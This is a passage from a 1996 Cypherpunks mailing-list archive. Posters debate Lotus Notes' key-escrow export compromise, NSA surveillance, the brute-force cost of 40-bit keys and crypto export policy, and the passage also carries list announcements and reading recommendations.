shipments of Exocets to various countries, nerve gas precursors, etc.). In
this sense, economic surveillance _is_ one of the main missions of the NSA.

I think it unlikely that the "NSA-enabled" Lotus solution will fly in these
countries. Will Matra really be happy to use the "40+24" solution for
sensitive inter-site communications, knowing full well about the many large
NSA SIGINT dishes scattered throughout Europe? Knowing that the NSA has the
24-bit extra key material and that 40-bit keys are easily breakable?

Somehow I think that these foreign governments, notably Germany and France,
will explicitly block these products from being imported into their
countries. A matter of national pride and all.

(After all, imagine a product made in Japan that is known to be
"Chobetsu-enabled." The U.S. government would not be too happy to see U.S.
companies embracing such a product.)

By making crypto restrictions "slide down easily," Lotus and IBM have not
done us any favors. Fortunately, I think their scheme is doomed.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent S. Gunville" <vingun@rgalex.com>
Date: Sat, 20 Jan 1996 01:13:01 +0800
To: mikshe@rgalex.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601172347.SAA19227@bb.hks.net>
Message-ID: <30FFCD3B.13B5@rgalex.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Pugh wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - -- [ From: Alan Pugh * EMC.Ver #2.3 ] --
> 
> Since this is definitely on-list, and I haven't seen
> anything on it here yet, I'm posting the whole thing.
> Apologies for duplication.
> 
> Date: Wednesday, 17-Jan-96 04:23 PM
> 
> Subject: infoMCI FLASH - Lotus-Security - Lotus Announces C
> 
> [infoMCI FLASH]
>                                 i n f o M C I  F L A S H
> 
> infoMCI (sm)
> Lotus-Security - Lotus Announces Compromise for Export of Strong
> Encryption
> 
> By ELIZABETH WEISE
> AP Cyberspace Writer
> 
> SAN FRANCISCO (AP) _ Lotus Development Corp. announced a
> compromise with the federal government Wednesday that will allow it
> to put better security features into the international version of
> its Notes program.
> 
> While the arrangement assures the government it can access data
> under extreme circumstances, it represents an advance in the
> strength of security allowed in software exported from the United
> States.
> 
> Federal law prohibits the export of certain high-level
> encryption programs, which are defined as a munition under a Cold
> War-era arms control act.
> 
> Encryption programs take ordinary data and put it in secret form
> that cannot be accessed without the proper data ``key.'' The
> government's arbitrary standard for cracking encryption programs
> when needed is at a technical level described as ``40-bit.''
> 
> Some software programs sold in the United States, including
> Lotus Notes, now use stronger 64-bit encryption. Lotus has been
> under pressure to bring such security to Notes users overseas.
> 
> Although 40-bit encryption is quite strong, highly-sophisticated
> attacks using several computers have been able to break it
> recently.
> 
> ``Our customers have basically lost confidence in 40-bit
> cryptography,'' said Ray Ozzie, president of Iris Associates, the
> unit of Lotus that developed Notes.
> 
> ``That left us in a bind. We are the vendor that's supposedly
> selling a secure system to them and they are saying it's no good,''
> Ozzie told a standing room audience at the RSA Data Security
> conference.
> 
> Changes in the general export laws seemed unlikely so Lotus
> negotiated an interim solution.
> 
> The export version of Lotus Notes 4.0, which went on sale last
> week, includes 64-bit encryption but the company has given the U.S.
> government a special code that unlocks the final 24 bits.
> 
> For companies that use the international version of Notes, it's
> as if Lotus put two strong locks on a door and gave a key for one
> to the U.S. government. Thieves have to get break through two
> locks, the government only one.
> 
> ``This protects corporate information from malicious crackers
> but permits the government to retain their current access,'' Ozzie
> said. He acknowledged the solution was only a compromise and said
> Lotus wants to see better data security methods developed
> worldwide.
> 
> However, many participants at the conference saw the move as a
> cosmetic answer to the tension between corporate desires for the
> best security and government's interest to access data when
> necessary.
> 
> ``It's a useful stopgap measure that has no value in the long
> run,'' said Donn Parker, a senior security consultant with SRI
> International, a computer research company in Menlo Park, Calif.
> 
> Simson Garfinkel, author and computer security expert, said he's
> not sure international buyers of Notes will like the solution.
> 
> ``Foreign companies don't want the U.S. government to spy on
> their data any more than the U.S. government wants foreign
> companies to be able to spy on theirs,'' Garfinkel said.
> 
> International Business Machines Corp. bought Lotus in July,
> citing the success of Notes, a sophisticated communications and
> database program.
> 
> AP-DS-01-17-96 1619EST
> 
>   (66413)
> 
> *** End of story ***
> 
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBMP2KdioZzwIn1bdtAQGdegF9GVCEfL50vWd7e5XX/mKEnzGy5YGvW0iD
> rNPCmz3Xxf3h9wOVJMLrCeDGwe4/m84g
> =6jpa
> -----END PGP SIGNATURE-----

-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|Vincent S. Gunville     
|Robbins-Gioia		 
|209 Madison St                       Email  vingun@rgalex.com
|Alexandria, Va 22309    
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Sun, 21 Jan 1996 04:36:05 +0800
To: cypherpunks@toad.com
Subject: Re: Win95 Registration Wizard info
Message-ID: <960119121126.204013d9@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


From:	SMTP%"alano@teleport.com" 18-JAN-1996 23:29:11.16
>At 10:03 AM 1/18/96 -0500, Perry E. Metzger wrote:
>>
>>Alan Olsen writes:
>>> I picked this link up from the Fringewear list.
>>[...]
>>> The author takes the registration Wizard in Win95 apart and shows exactly
>>> what it does and what it looks for.  Some interesting information about the
>>> encrypted database of product information it uses.
>>
>>What, exactly, does this have to do with cypherpunks?
>
>I posted it for two reasons.  
>
... reason one deleted ...

>2) The program's use of encryption to conceal what products it looks for.
>
... rest of message deleted ...

I also found interesting the use of a debugger to break Microsoft's crypto.
When we speak about crypto, we do not only refer to algorithms, we must also
consider insiders, eavesdroppers, etc...

Well, this is a good example of a technique to break encrypted messages that
has proven useful and, what's more, has the support of the operating system.
A big mistake from Microsoft. And also in many other vendors. While not
interesting in many protocols, it is worthy in those where one of the parts
doesn't trust the other.

The point is that any non-trusted party can try a similar approach -using a
debugger- to gather information from within their computer (passwords, keys,
data...) unless there is some way to prevent it (like using a better approach
or protocol).

It's silly to send text in the clear through an insecure channel. So it is
to store passwords in the clear in world-readable files. Or to keep data in
memory which can be paged to disk...

The article comes to point out that it is also as silly to store cleartext
in any program memory that can be accessed/traced/dissected by an untrusted
user. And that Microsoft obviously choose again a too weak (mean?) approach to
secure their data.

I wonder now wether one could still rely on Microsoft to provide a reasonable
Crypto API as they are bragging lately...

				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Sat, 20 Jan 1996 05:38:28 +0800
To: cypherpunks@toad.com
Subject: "Noise Filter" : Cypherpunks Lite Reminder...
Message-ID: <199601192019.MAA01779@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a friendly reminder to those of you overwhelmed by the noise...

I provide a moderated version of the Cypherpunks list called
"Cypherpunks Lite".  A one year subscription costs US$20 and is
payable by check or money order to "COMSEC Partners". Cypherpunks Lite
is available in either individual messages or a more-or-less daily
message digest.  The content of both are the same.  In either case, I
forward approximately 5 - 10% of the total Cypherpunks feed.  This
works out to about 5 - 10 messages / day.

To take a look at what you can expect there is an archive of the previous
selections organized by month at ftp://ftp.crl.com/users/co/comsec/cp-lite.
The files with the extension .gz are compressed using gzip.

If you would like to subscribe, please send payment to:

	COMSEC Partners
	1275 Fourth Street, Suite 194
	Santa Rosa, CA 95404 USA

Be sure to provide the email address you want us to use, as well as
indicating your preference for individual messages or the digest.

Thanks again,
Eric Blossom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 20 Jan 1996 03:16:58 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: "cybertage"
In-Reply-To: <199601191722.JAA04520@netcom18.netcom.com>
Message-ID: <199601191846.MAA12766@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> how about a new term for all the various enemies of cyberspatial 
> advancement?

I think this is a bad idea.  We should be moving away from demonization, 
not towards it.  

We are right, and they are wrong.  The good thing about being right is
that logic and the facts will bear us out.  Let's use rational arguments,
not name calling.  Save the nasty names for another fight when you're
wrong and the other guy is right.  

We should build a case to show that everyone -- including those who
disagree with us -- will be better off if we win.  It's the truth, so we
ought to be able to come up with good arguments.

Unfettered access to strong crypto is in everyone's intrest.  It's good
for business and it's good for civil liberties and freedom around the
world.  These are not complicated things to grasp.  If we get our message
out there, we will win.

Lotus has made a mistake.  Their gak plan won't reassure international
customers, which is to say it won't do what they want it to do.  So why do
it?  Instead of calling them names, let's explain why it was a bad idea. 
Let's try to explain to Lotus customers why it's a bad idea.  If we can do
that, we'll get a response.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 21 Jan 1996 01:54:21 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: NSA vacuuming down Internet traffic
In-Reply-To: <199601190923.KAA10526@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960119124825.19718A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


If I were standing in one of the places where NSA has it's taps of the 
Net - what would I see? Alligator clips across terminal strips, leading 
to a bunch of T3 lines?

Is there any open source - or otherwise - knowledge or speculation about
which words/phrases the Terra-cycle cpu's are text-searching *for*?  If it
were your responsibility to eavesdrop on Iranian terrorists - or French
Commercial Attache reports to Paris - or to have UK nationals, off in
their private room of your building, write down the name of every in
America who expresses a libertarian dissatisfaction with the Republicrat
regime - would you know for sure which words/phrases to key on?   It 
doesn't sound like a tractable problem to me.

Of course, some people don't need to worry about the GAO doing their own 
evaluation of how well an agency is doing its assigned mission!

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 20 Jan 1996 10:15:33 +0800
To: cypherpunks@toad.com
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <199601190919.KAA10339@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.960119110051.468A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 19 Jan 1996, Anonymous (signed We Jurgar Din, allegedly
0x21B699E1, not on MIT key server) wrote: 

> I'm not. Maybe *you* should be more suspicious of the guy getting
> paid $100K of direct government money to manage a national 
> campaign of low-key terror than you should of the private 
> businessman unable to pay himself because he *must* pay his 
> employees and the government doesn't leave him enough for his 
> own paycheck. This last is a *lot* more common than the "private 
> businessman getting millions of dollars in government subsidies."

Er, yes. And I am. Struggling businessmen are also a lot more common than 
guys and gals getting paid direct and indirect government money for high-
key terror and murder, of which there's a lot. What's your point?
 
> > I think we're fundamentally asking the wrong question. I only 
> > see relative power. I'd estimate that Bill Gates is more 
> > powerful than Fidel Castro in  many respects. He's certainly a 
> > lot more powerful than your average postal clerk. 
> 
> "Looking for pow'r... in all the wrong places, (la-tee-dah)..."
> Admit it, Rich, you only see harmful power where you want to see 
> it, and that isn't in government -- it is in private hands, 
> particularly *corporate* hands. 

Governments and religions of all kinds have killed more people than
anything else besides old age and disease. There's no denying that. But
who has more influence over most people's daily lives?

What are the instruments of government, and for what interests is
government an instrument? Isn't it a good tactic to go after lazy or
stupid corporations friendly with the government who are providing poor
tools injurious to personal privacy and security?  [Timed essay, 30
points. Use both sides of the CRT if necessary.  Spelling counts.]

> Geez, but you'd think that 
> left-handed university cookie cutter would have gotten dulled and 
> broken by now, and that they'd have fashioned a new one.

For whatever it's worth, I'm right-handed.

I see you use public key cryptography, which like many good things was
developed at a left-handed university with great respect for academic
freedom. You might try visiting one to see what they're like. 
 
> I'd estimate that the Postmaster General is more powerful than 
> Fidel Castro in many respects. He's certainly a lot more powerful 
> than your average private businessman.

No, he's got a sinecure with a common carrier that doesn't mean much. If
you meant that the folks who would intercept your mail if you're
"suspected" are more powerful than Castro, I might agree, but that's not
the Postmaster General. He has no power to order or stop that. 

I'll certainly grant you that there is a conspiracy and a secret
government (broadly defined), but not everyone paid by the government is
in on it, and not everyone involved is in the government. 

> We Jurgar Din
> (that will have to suffice: I do not yet live in a free country)
> 
> +"The battle, Sir, is not to the strong alone. It is to the+
> +vigilant, the active, the brave. Besides, Sir, we have no +
> +election. If we were base enough to desire it, it is now  +
> +too late to retire from the contest." -Patrick Henry 1775 +

While I firmly support the right to anonymonity, I find this juxtaposition
ironic. 

I do hope that you are speaking out on the record as well. Your "Indecent
Garbage" piece, <199601190944.KAA10937@utopia.hacktic.nl>, was excellent,
but you can't get it published widely unless you're willing to put your
"real life" John Hancock or Patrick Henry on it. 

Gratuitous use of pseudonymity can be counterproductive. Now nobody's
going to be able to use your "bar-coded garbage" essay without being 
suspected of being you, which I doubt is what you want.

Is anyone going to quote you in the future, as you quote Patrick Henry?

I helped get Sameer quoted in PC Week and InfoWorld. Not exactly the way
we'd all like, but it does point people who otherwise wouldn't think twice
about crypto and privacy to www.c2.org. 

My 3 1/2 years in the "cookie cutter" were mostly a study of revolutions
betrayed. First the Bolsheviks and their later rampage through Eastern
Europe (I have a couple of close friends from Budapest, Praha, Bratislava,
and Shanghai), then when that died the Cuban, Sandinista, Contra, Sendero,
and Mexican. 

The only revolution I can think of that did not *completely* betray its
principles was the American War of Independence, which wasn't really a
revolution at all but a secession from a tyrannical regime. Part of the
reason it did well was that remoteness and bravery led those involved to
stand up for what they believed in. You can only go so far with
subversion. (It also helped that the Colonial goals were very modest. Yet
they still ended up with the Whiskey Rebellion, a great expansion of the
practice of slavery, and the Native American genocide in short order.)

Get yourself a broader education and elevate the culture. Mario Vargas
Llosa, Boris Pasternak, and Milan Kundera would be particularly good for
you. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQAEjo3DXUbM57SdAQEg0gP+Nhht/Zp39p/mcQ7GNgS3x/Db4b+CZohb
QmkeC50sSEAoxOjGuV8N2PLr0yYaSdFhU/GyUeGNKbHg8acjb9D7IzsKrdXBze6F
5hWYz78O08xDST0NTMSCbRqcM2o8qKQBfgIjKGCMSc4tFnBvoLT+fG/S+wKejeID
NG9NbEQuYOs=
=GPRY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 20 Jan 1996 05:50:34 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Netscape and NSA
In-Reply-To: <30FF642C.400@netscape.com>
Message-ID: <31000A18.1DB7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> It would be good for everyone if Netscape took a more aggressive political
> stand for free access to strong crypto.  How?  Expand the crypto coverage
> on Netscape's web server.  Hire a full time person to write about crypto
> technology and issues.  Put a link to the site on the Netscape home page.
> Netscape's home page links are the most visible on the net -- use them.
> Get together with companies like Sun and Microsoft to form a lobbying and
> publicity organization similar to the Tobacco Institute.  (I know that's a
> bad example -- many people think the Tobacco Institute is an evil
> organization.  But it's a good tactic.)

  This is the sort of stuff we are starting to do.  Expect to see it
over the next few months.  Jim Barksdale's comments at the RSA conference
this week are part of this effort.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Sat, 20 Jan 1996 10:14:22 +0800
To: phorgan@broadvision.com
Subject: Re: What's a good math text?
Message-ID: <199601200004.QAA21392@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




> I'm not on the list just now, my work won't allow me the time to follow it.
> I'm still just as interested in cryptography though, and would like
> y'all to email me recommendations on good math books that will give me
> the background to understand the papers in the field.  I'm sure that will
> include a good numbers theory text.  If a beginner at number theory
> would have a hard time understanding it, please recommend background
> texts as well:)  What else would I need?  My computer science texts
> explain complexity theory well, what would I need in information theory.
> What would I have to read to understand factoring complexity?  Are there
> any new texts that cover the recent breakthroughs in factoring?
 
An excellent introductory cryptography textbook that's oriented toward
number theory is:

     A Course in Number Theory and Cryptography, 2nd ed.
     by Neal Koblitz
     Springer Verlag

If you want a "classic" number theory text, I recommend:

     An Introduction to the Theory of Numbers, 5th ed.
     by G.H. Hardy and E.M. Wright
     Clarendon Press, Oxford University Press

If you'd like a good introduction to factoring, try:

     Factorisation and Primality Testing
     by David Bressoud
     Springer Verlag

Of course, it goes without saying that anyone studying cryptography ought
to have a copy of:

     Applied Cryptography, 2nd ed.
     by Bruce Schneier
     John Wiley

Hope that helps.

Dana W. Albrecht
dwa@corsair.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 19 Jan 1996 18:25:01 +0800
To: daw@beijing.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Hack Lotus?
In-Reply-To: <199601190154.UAA24710@bb.hks.net>
Message-ID: <199601190610.RAA17232@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and daw@beijing.CS.Berkeley.EDU (David A Wagner)
 
...
> Hack Lotus?  Please do.
...
> If the receiving Lotus Notes program does verify that the high 24 bits
> are escrowed correctly, then anyone can verify that, so in 2^24 trials,
> I can recover the high 24 bits, and with 2^40 more trials, I can recover
> the high 40 bits.  Therefore 2^40 + 2^24 trials should suffice to hack
> Lotus if this is how it works.
...


I have no idea how Lotus actually does this, but:

How about a salt determined by the forty bit part?

Ie if the key is s.g (s=secret, g=gaked), the BARF (="Big-brother Access
Required Field") could contain Encrypt(Hash(s).g,BigBrother).

The receiving end, knowing both s and g, could re-calculate the
BARF and only function when it's correct. Unless it's been hacked too,
in which case it could barf when the BARF is correct :-)


Would that work or have I missed something? As I said, I've no idea
what Lotus actually does.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMP81zCxV6mvvBgf5AQGcZgP+PZyX+uZsHcG/RM29onq8d7FB402nHiqM
QgZi6dXb7AkilYrw0YGt1fDDzi1W7+0bufmX2sa02r6Yh/MkJ8Lw+O/WHYau5eDP
XC91pTFQHAYlvi9zNIKoclh1x2Z3dDUkly5yBA3nAhDuY2tcteop8nPLewA49qm5
H61a7l3o+Ys=
=Prxc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Sat, 20 Jan 1996 09:51:53 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Elitism on Cypherpunks
Message-ID: <199601200131.RAA26034@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:55 PM 1/18/96 -0800, Alan Olsen wrote:
>It has been said that "Cypherpunks write code".  They must do more than 
>that.  Cypherpunks need to teach.

Just remember you brought this up...

Not all of us even write code. Some of us write (horrors!) books! Yes, my
brethren, I earn my pay as a lowly scribe. Do I code? Nope. Am I a
Cypherpunk? Christ, I don't care. I'm on this mailing list; that works fine
for me. My brain expands almost daily from contact with such seditious sods.
Do I contribute to the health and growth of this list? Maybe. Do I preach
the Cypherpunk doctrine through my work at my company? Definitely. 

Just thought I'd point out that we aren't all code-monkeys. (And I mean that
in the best sense of the word.)

Corey Bridges
Security Documentation
Netscape Communications Corporation
home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sat, 20 Jan 1996 11:46:24 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape and NSA
Message-ID: <199601192231.RAA28578@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601191702.LAA12547@proust.suba.com>,
Alex Strasheim <cp@proust.suba.com> wrote:
> The Lotus approach is totally unacceptable.  [...]
> This is the first wave of guys hitting the beach.  [...]
> We don't have a lot of options in terms of strategy.

Let's hack Lotus.

Let's put out a binary patch which defeats Lotus's GAK.
Let's look for weaknesses in their crypto implementation.

Time for me to go looking for a Unix version of Lotus Notes 4.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQAbwyoZzwIn1bdtAQGliAF/bz+i9Uu6N1gK0g/2G7WfN3Wv7zQJVRFG
csq1ROPrZE65kzRYa8uwo8xjVszSDbrf
=0yvk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mbartels <mbartels@astro.ocis.temple.edu>
Date: Sat, 20 Jan 1996 12:24:28 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <Pine.BSD.3.91.960119173314.6475K-100000@astro.ocis.temple.edu>
MIME-Version: 1.0
Content-Type: text/plain


You come recommended by the Happy Mutant Handbook. Was just wondering 
what you suggestions/imput/stuff you guys have up your sleeve.  Happy, 
Happy!!
tanks.
Weaselicious Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jan 1996 12:40:14 +0800
To: mbartels <cypherpunks@toad.com
Subject: Re: mailing list
Message-ID: <ad257ab000021004cf91@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 PM 1/19/96, mbartels wrote:
>You come recommended by the Happy Mutant Handbook. Was just wondering
>what you suggestions/imput/stuff you guys have up your sleeve.  Happy,
>Happy!!
>tanks.
>Weaselicious Inc.

"Tanks"? We have no tanks, only cryptography.

Looks like the cypherpunks@toad.com address, instead of majordomo@toad.com
address, has again been put out in some book. (In this case, something
called the "Happy Mutant Handbook.") Get read for another onslaught.

For "Weaselicious," you can subscribe to the Cypherpunks mailing list by
sending a message to

majordomo@toad.com

with a body message of

subscribe cypherpunks

(Send this from the e-mail address which you wish subscribed to the list.)

You will receive a welcome message with more information, including the
all-important information on how to UNSUBSCRIBE. Don't lose this message,
as yoy may need it.

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 20 Jan 1996 10:48:04 +0800
To: gnu@toad.com
Subject: EE Times mentions c'punks scrutiny as helping Netscape
Message-ID: <9601200213.AA08059@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Electronic Engineering Times, Jan 8, 1996, pg. 22
"Net battleground awaits Microsoft's salvo", by Larry Lange.

[skip half a page]...

Security stand-off

The side skirmish over security protocols for credit-card payments
over the Net is just beginning to heat up.  The major combatants here
are Netscape's Secure Socket Layer (SSL), Enterprise Integration
Technologies' Secure Hypertext Protocol (S-HTTP) -- which may yet wind
up under Netscape's wing -- and Microsoft's fairly recent stab at the
issue in the form of its Secure Transaction Technology (STT).
Netscape is way ahead of the game here, having successfully weathered
the scrutiny of the ``cypherpunks'' -- above-board encryption hackers
who look for security holes.

...

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 21 Jan 1996 04:55:08 +0800
To: cypherpunks-announce@toad.com
Subject: Jan 27 special Bay Area CA mtg
Message-ID: <199601200224.SAA07329@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Out-of-band cypherpunk meeting
Saturday Jan 27
12 noon - 3 p.m.
Sparcy's cafeteria, B21, Sun Microsystems, Mountain View, California

The reason to call a special half-meeting on January 27th is that a
producer/videographer for PBS would like to film a discussion among
cypherpunks about 1st amendment issues, for a PBS show named "Freedom
Speaks."

The show airs nationally on PBS.  In San Francisco, currently on KMPT
Thursdays at 5 p.m., and starting in March, on KQED.

The producer is Roger Masterton and he describes his goals like so:
(the parts in between [] are my paraphrasing of what he said, for
brevity)

	I am currently working on the story for a program we
	will tape in 2 weeks about Cryptography, focusing on the
	Free Speech aspect as well as the governments attempt to limit
	export of programs.
	...
	The reason that I'm writing to you is that we would like to
	shoot a cypherpunks meeting as a way of introducing the
	[program.]

	[We want to film cypherpunks talking on camera] about the need
	for cryptograpy and the government's attempt to control access.  
	...

I talked with him on the phone.  He is affiliated with a group known
as the Freedom Forum in Arlington, VA, which is non-partisan and
non-profit.

I said, sure, I'd be glad to reserve the room and call for a meeting,
but that it would be up to the local Bay Area cypherpunk community as
to whether or not folks could make this meeting.

I also mentioned that a number of us have had mixed experiences with
the media, and that we're pretty cynical about being presented fairly.
I told him a several of us have endured the problem of spending all
day in some video shoot, only to have 10 seconds of out-of-context
inflammatory sound byte show up on the eventual program.

If you want to, it would help me to know if you think you can make the
meeting on Jan 27th, so we have some idea how long to wait for people
to show up before starting the "official" agenda.

Marianne
mrm@eng.sun.com
mrm@netcom.com

p.s. directions to B21 of Sun: 

Take 101 south to Amphitheater Parkway.  Turn left at the light at the
bottom of the exit ramp onto Charleston.  (This street is also known
as Garcia.)  After about 1/3 mile, turn right onto the first real side
street.  In about 2 long city blocks, you'll see big purple and white
signs for B21 of Sun.  The meeting is held in the cafeteria.  This
time I'll bring blank foils and pens.  :-) 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 20 Jan 1996 13:07:23 +0800
To: Tom Johnston <tomj@microsoft.com>
Subject: Re: CryptoAPI and export question
Message-ID: <199601200402.UAA01863@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Johnston <tomj@microsoft.com>:
At 06:07 PM 1/17/96 EST, you wrote:
>Two points:  the CSP development kit is export-controlled; and signing a
>CSP developed by a foreign vendor is treated as a export -- so the signature
>is export-controlled.
>
>We would ship a CSP development kit to a foreign vendor, and sign a CSP
>developed by the foreign vendor, but only with the appropriate export licenses.

Thanks for your reply to Dr. Vulis's question.  I'd recommend examining this
policy somewhat critically, for a couple of reasons:

1) Development kits are useful, but if you've got an open, documented
interface, it's possible to develop code to use it without the kit.
(Ignoring, of course, the risk of smuggling. :-)

2) By "is treated as an export", do you mean by explicit government policy,
or by Microsoft?  Digital signatures and encrypted documents are perfectly
legal to export, as is authentication code to make digital signatures.

3) Consider the case of a contractor who buys the development kit,
and gives you code to sign.  You have no way to differentiate between
code that he developed himself, and code developed by some foreign
company that hired him and gave him the code (which is legal to import
into the US.)  He probably can't legally re-export the code, or export
the signed version of it, but he can export the signature itself,
since that's not cryptographic code, and the foreign company can
reattach it to their original document, which you have now signed....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jan 1996 03:55:50 +0800
To: cypherpunks@toad.com
Subject: Re: Espionage-enabled Lotus notes.
Message-ID: <199601200403.UAA01942@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 1/18/96 -0500, hallam@w3.org wrote:
>The problem with this system is that it is quite likely to suceed. Unlike 
>Clipper which made unfettered access to encrypted material possible the
escrowed 
>key strength reduction means that the FBI can tap a significant number of 
>locations, just not all of them.

40-unknown-bit RC4 may take a week for an ICE workstation or a herd of
net-coordinated workstations, but it would be much faster to crack on
a specialized machine actually designed for RC4.  I think Eric's estimate
was $25-50K for a machine that could do it in 15 minutes, built out of
programmable gate arrays.  That's not $10,000/crack, or $584, but $0.25-.50.
Would they crack all the keys they wanted for a quarter each?  Sure;
at that rate it's probably cheaper to crack them than read them
(though in reality they'd feed most of them to keyword scanners.)

>It will be very hard to argue effectively against this idea in Congress.
>Much harder than the Clipper chip which was dead on arrival.

You may be right.  They keep making outrageous demands, and "compromising" on
less outrageous ones.   Something prominently not mentioned in the article was
"escrow agents" for the 24 bits of wiretap-support key; apparently foreigners
don't get even that much due process.  Nor was there a clarification of
whether all the software has the same wiretap key (probable) or each copy has
a different wiretap key (the Clipper model.)  If it's just one key, 
then nobody's mail is safe.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





